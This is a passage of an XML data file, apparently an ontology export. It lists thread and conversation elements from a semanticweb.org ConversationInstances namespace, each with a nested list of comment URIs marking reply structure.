</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_38</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473791
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471163
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471797
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_22</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473463
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_70</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471265
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_88</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471541
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478913
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_46</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478149
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_32</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471721
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_56</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472933
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_40</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472905
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_118</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486235
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471355
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_150</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471647
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_69</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470977
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471357
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_27</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471037
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_128</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486099
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_77</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471913
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_35</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473929
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_21</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479607
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_136</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471923
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_147</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471631
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_105</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475543
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_99</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471747
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_06_25_1856214_45</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473051
</commentlist>
</thread>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471349
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481665
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480067
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478845
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473179
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.21</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470953
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477985
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.19</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470981
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.31</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472359
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472913
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471459
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471873
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471285
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482413
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471261
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.27</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470911
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470923
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472001
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471035
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.24</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471091
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.37</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472533
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472065
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472063
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477937
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471553
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.32</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471453
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470979
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471159
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471197
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471753
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471299
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473463
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472101
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472539
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472287
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473295
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471765
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.20</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471449
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.33</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481367
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.29</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473197
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.23</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471497
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471577
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470985
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472079
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473051
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.26</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471539
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470977
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471357
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470925
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471415
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.34</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472293
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471667
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471455
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476125
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471403
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471815
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473235
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471663
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478875
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471377
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471971
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473063
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473511
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472139
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471721
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471397
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472685
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472933
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472853
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471631
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472691
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473097
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471599
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471661
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470817
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480011
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473159
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476933
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477551
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471295
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471133
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475529
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471191
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482069
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471789
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28485403
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478229
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472017
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471053
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472457
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471925
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471549
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471541
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478913
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474693
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477229
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471477
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471575
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471747
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471665
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471259
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472069
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471265
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471225
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476217
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472595
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471913
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473503
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476047
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471287
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471355
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474347
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471037
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471167
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473347
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471347
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477787
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473285
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471181
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471845
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475157
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475481
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471923
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471555
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472395
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471363
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472053
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470971
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471473
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471391
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.25</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471407
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473523
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28479607
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.28</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475623
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472745
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472895
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472247
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478241
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472693
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28484675
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472383
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471509
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472099
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.22</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473397
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28486235
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.35</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28507569
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478149
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_06_25_1856214.18</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475289
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475543
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28487211
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476659
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472535
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474425
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476437
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475429
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475323
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471513
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474525
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476521
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473605
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480147
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471589
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478881
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472381
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471619
